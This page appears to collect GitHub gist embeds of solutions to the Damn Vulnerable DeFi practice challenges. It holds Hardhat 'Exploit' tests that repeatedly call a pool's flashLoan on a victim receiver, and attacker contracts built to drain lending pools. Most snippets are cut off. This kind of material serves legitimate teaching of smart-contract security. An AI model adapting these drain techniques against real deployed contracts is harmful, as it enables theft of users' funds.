This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
this.pool.connect(attacker); | |
for (i = 1; i <= 10; i ++) { | |
this.pool.flashLoan(this.receiver.address, 0) | |
} | |
console.log(await ethers.provider.getBalance(this.receiver.address)) | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
import "@openzeppelin/contracts/utils/Address.sol"; | |
import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
/** | |
* @title TrusterLenderPool |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
contract TrusterExploiter { | |
TrusterLenderPool public immutable pool; | |
IERC20 public immutable token; | |
constructor(address _pool, address _token) { | |
pool = TrusterLenderPool(_pool); | |
token = IERC20(_token); | |
} | |
function attack() external { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
/** CODE YOUR EXPLOIT HERE */ | |
const TrusterExploiter = await ethers.getContractFactory("TrusterExploiter", attacker); | |
this.exploit = await TrusterExploiter.deploy(this.pool.address, this.token.address); | |
await this.exploit.connect(attacker).attack(); | |
console.log("Updated pool balance is: ", await this.token.balanceOf(this.pool.address)); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/utils/Address.sol"; | |
interface IFlashLoanEtherReceiver { | |
function execute() external payable; | |
} | |
/** |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
contract AttackerContract { | |
SideEntranceLenderPool pool; | |
address payable attacker; | |
constructor(address _pool) { | |
pool = SideEntranceLenderPool(_pool); | |
attacker = payable(msg.sender); | |
} | |
function exploit(uint256 amount) public { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
const AttackerContract = await ethers.getContractFactory("AttackerContract", attacker); | |
this.exploit = await AttackerContract.deploy(await this.pool.address); | |
this.exploit.connect(attacker).exploit(ETHER_IN_POOL); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol"; | |
import "@openzeppelin/contracts/utils/Address.sol"; | |
import "./SimpleGovernance.sol"; | |
/** | |
* @title SelfiePool |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
... | |
contract SimpleGovernance { | |
... | |
struct GovernanceAction { | |
address receiver; |